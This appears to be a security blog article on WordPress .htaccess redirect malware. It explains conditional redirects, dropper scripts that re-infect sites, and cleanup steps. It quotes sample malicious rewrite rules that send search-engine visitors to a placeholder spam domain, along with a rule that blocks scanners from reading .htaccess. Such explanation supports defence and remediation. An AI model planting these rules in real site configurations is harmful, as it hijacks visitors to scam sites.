My WordPress Site is Redirecting to Spam! Understanding .htaccess Redirect Malware

Imagine this scenario: A visitor clicks a link to your WordPress site from Google. Instead of seeing your homepage, their browser flickers, and suddenly they landed on a shady website selling pharmaceuticals, cryptocurrency scams, or adult content.

Yet, when you type your URL directly into your browser, the site looks fine. What is going on?

You are likely the victim of a sophisticated attack known as .htaccess redirect malware. It is one of the most frustrating and damaging forms of WordPress hacks because it is designed to be invisible to site owners while hijacking your valuable SEO traffic.

In this article, we will explain how this malware uses your server against you, why it’s so sneaky, and how to stop the redirects for good.

What is .htaccess Redirect Malware?

Your .htaccess file is a powerful configuration file located in the root directory of your WordPress installation. It runs on Apache web servers and acts like a traffic controller. Normally, WordPress uses it to manage pretty permalinks.

When hackers compromise a site, the .htaccess file is their primary target. By injecting malicious rules into this file, they can instruct your server to intercept incoming visitors and immediately send them elsewhere. They are essentially bribing the traffic controller to send your visitors down a dark alley.

The Sneaky Part: Conditional Redirects

Many site owners ask: “If my site is infected, why can I still access it normally?”

Modern WordPress malware is smart. Hackers know that if you see your site redirecting to spam, you will fix it immediately. To keep the hack running longer, they use conditional redirects.

The malware checks who the visitor is before redirecting them. It looks at the “User-Agent” (what browser or device they are using) and the “Referer” (where they came from).

Common malicious conditions include:

• Mobile-Only Redirects: The hack only triggers if the visitor is on an iPhone or Android device. Desktop users see the normal site.
• Search Engine Redirects: The hack only triggers if the visitor clicked a link on Google, Bing, or Yahoo. Tying your URL directly works fine.
• Bot Detection: The malware tries to hide from security crawlers and search engine bots to avoid detection by Google Search Console.

Analyzing the Malicious Code

If you open an infected .htaccess file via FTP or cPanel, you will often find large blocks of code inserted at the very top, before the # BEGIN WordPress comment line.

Here is an example of what conditional .htaccess redirect malware looks like. Notice how it checks for specific conditions before executing the redirect rule.

<IfModule mod_rewrite.c> RewriteEngine On
Check if the visitor is coming from a major search engine

RewriteCond %{HTTP_REFERER} ^.(google|bing|yahoo|yandex).$ [NC]
AND check if the visitor is NOT a known bot/crawler

RewriteCond %{HTTP_USER_AGENT} !(googlebot|bingbot|slurp|duckduckbot) [NC]
If conditions met, redirect to the spam domain

RewriteRule ^(.*)$ http://malicious-spam-domain.com/$1 [L,R=302] </IfModule>

Another common tactic is to block access to the file itself, making it hard for security plugins to scan it:

<Files .htaccess> order allow,deny deny from all </Files>

The “Whack-a-Mole” Problem: The Dropper Script

The most infuriating part of .htaccess redirect malware is that it often comes back minutes after you fix it.

You delete the malicious code, save the file, and your site works again. Ten minutes later, the redirects are back. Why?

Because the infection is not just in the .htaccess file. The modified .htaccess is just the symptom. The disease is a separate PHP file hidden somewhere else on your server, known as a “dropper” or “regenerator” script.

This hidden script runs periodically (often triggered by normal site traffic or a cron job). Its entire job is to check if the .htaccess file is “clean,” and if so, re-inject the malicious redirect code. Until you find and delete the dropper script, the problem will never go away.

How to Fix the Issue Permanently

Cleaning up a redirect hack requires a systematic approach.

1. The Immediate Fix (Stop the Bleeding)

Access your server via FTP or cPanel File Manager. Locate the .htaccess file in your root directory (usually public_html). Edit the file and delete the suspicious code blocks at the top. Ensure only the default WordPress rules remain.

2. Change File Permissions

To temporarily stop the dropper script from editing the file again, change the permissions of the .htaccess file to “444” (read-only). Note that this will also prevent WordPress from updating your permalinks.

3. Hunt for the Dropper

This is the hardest part. You need a deep server scan. Use high-quality security plugins like Wordfence or Sucuri to scan core files for modifications. Look for recently modified PHP files in your /wp-content/uploads/ folder or strangely named files in your root directory (e.g., radio.php, input.php, wp-info.php).

4. Check Cron Jobs

Check your hosting control panel for any suspicious Cron Jobs that might be triggering the re-infection script.

Conclusion

.htaccess redirect malware is a serious threat to your site’s reputation and SEO rankings. Because it hides from site owners using conditional logic, it can go unnoticed for weeks. If your visitors are complaining about spam redirects, don’t ignore them—act immediately to clean your server and lock down your security.